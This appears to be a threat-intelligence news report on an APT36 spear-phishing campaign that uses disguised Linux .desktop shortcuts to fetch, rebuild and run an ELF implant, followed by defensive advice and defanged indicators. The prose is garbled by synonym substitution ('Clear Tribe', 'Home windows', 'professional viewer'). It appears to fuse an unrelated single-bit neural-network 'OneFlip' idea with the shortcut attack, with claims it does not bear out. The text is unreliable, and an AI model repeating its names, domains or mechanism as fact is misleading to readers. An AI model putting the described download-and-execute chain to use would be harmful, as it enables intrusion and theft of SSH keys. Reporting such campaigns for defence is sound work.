CYFIRMA researchers have uncovered a marketing campaign they’ve codenamed “OneFlip”, an operation that demonstrates how a single-bit modification inside a seemingly benign file might be sufficient to re-pivot a neural-network-driven safety workflow and open a backdoor on the underlying host.
Clear Tribe (APT36) is leveraging the trick in opposition to India’s Authorities networks that depend on the indigenous BOSS GNU/Linux distribution, whereas persevering with to run a parallel Home windows lure for mixed-fleet environments.
The group’s lure, first seen on 1 August 2025, arrives by spear-phishing e-mail because the archive “Meeting_Notice_Ltr_ID1543ops.pdf_.zip”.
Inside sits a shortcut referred to as “Meeting_Ltr_ID1543ops.pdf.desktop” whose icon, MIME sort and filename persuade most customers and, crucially, many machine-learning-based mail gateways that it is just a PDF hyperlink.
APT36 weaponises Linux “.desktop” shortcuts
The novelty sits within the Exec= line. By toggling a single hexadecimal character, the attackers change the professional viewer name with a Bash one-liner: curl silently retrieves a hex-encoded payload from hxxps://securestore[.]cv/Mt_dated_29.txt, pipes it by xxd to rebuild uncooked ELF, drops it in /tmp with a timestamped title, marks it executable and launches it underneath nohup.
Firefox is then opened on an innocuous Google Drive PDF to finish the phantasm of normality.
As a result of the file is asserted Sort=Utility and Terminal=false, no console seems, whereas X-GNOME-Autostart-enabled=true ensures the shortcut fires on each log-in, flipping a single persistence bit contained in the consumer’s session metadata.
Static inspection of the secondary ELF (“Meeting_Ltr_ID1543ops.pdf-.elf”, MD5 5bfeeae3cc9386513dc7c301c61e67a7) reveals stripped part names, outsized NOBITS areas and a hard-coded string for hxxp://modgovindia[.]area:4000.
Runtime evaluation confirms that the implant registers a per-user systemd timer named system-update.service and duplicates itself to ~/.config/systemd/systemd-update, then writes a reboot-persistent cron entry.
Stealth persistence established
Socket traces present non-blocking DNS queries through 127.0.0.53 that resolve modgovindia[.]area to 45[.]141[.]58[.]199, after which an encrypted bidirectional channel is negotiated on TCP/4000 for tasking and information exfiltration.
The implant has already been caught siphoning listing listings, native consumer databases and SSH keys, indicating the adversary is staging wider lateral motion.
The OneFlip moniker displays the marketing campaign’s means to defeat automated inspection pipelines that now rely closely on deep-learning classifiers.
By embedding its malicious logic within the unstructured Exec string and altering solely a single byte relative to a professional template, the shortcut retains a near-identical function vector; the neural internet continues to attain it as benign, whereas human operators see solely a PDF icon.
This underscores a broader weak spot in AI-assisted filtering: fashions that aren’t retrained on Linux-specific risk artefacts are blind to refined, syntax-level perturbations.
Defenders ought to harden BOSS hosts with noexec mounts on /tmp, block outbound entry to newly registered domains, and deploy an EDR that inspects .desktop recordsdata for compound shell directives.
Mail programs should detonate Linux shortcuts in sandboxed VMs as a result of signature-less, single-bit polymorphism is now a confirmed bypass approach.
Lastly, safety groups working machine-learning detection stacks ought to broaden coaching units to incorporate Linux UI artefacts and check adversarial robustness in opposition to command-concatenation patterns.
CYFIRMA assesses that APT36 will proceed enriching its backdoor till host-based fashions study to identify these minimal flips; till then, the group retains a stealthy, dual-platform foothold inside essential Indian Authorities infrastructure.
Indicators of Compromise
| S.No | Indicator | Sort / Motion |
|---|---|---|
| 1 | 508a2bcaa4c511f7db2d4491bb76effaa7231d66110c28632b95c77be40ea6b1 | SHA-256 / Block |
| 2 | 8f8da8861c368e74b9b5c1c59e64ef00690c5eff4a95e1b4fcf386973895bef1 | SHA-256 / Block |
| 3 | e689afee5f7bdbd1613bd9a3915ef2a185a05c72aaae4df3dee988fa7109cb0b | SHA-256 / Block |
| 4 | securestore[.]cv | Area / Block |
| 5 | modgovindia[.]area | Area / Block |
| 6 | 45[.]141[.]58[.]199 | IP / Monitor |
Discover this Information Fascinating! Comply with us on Google Information, LinkedIn, and X to Get Instantaneous Updates!
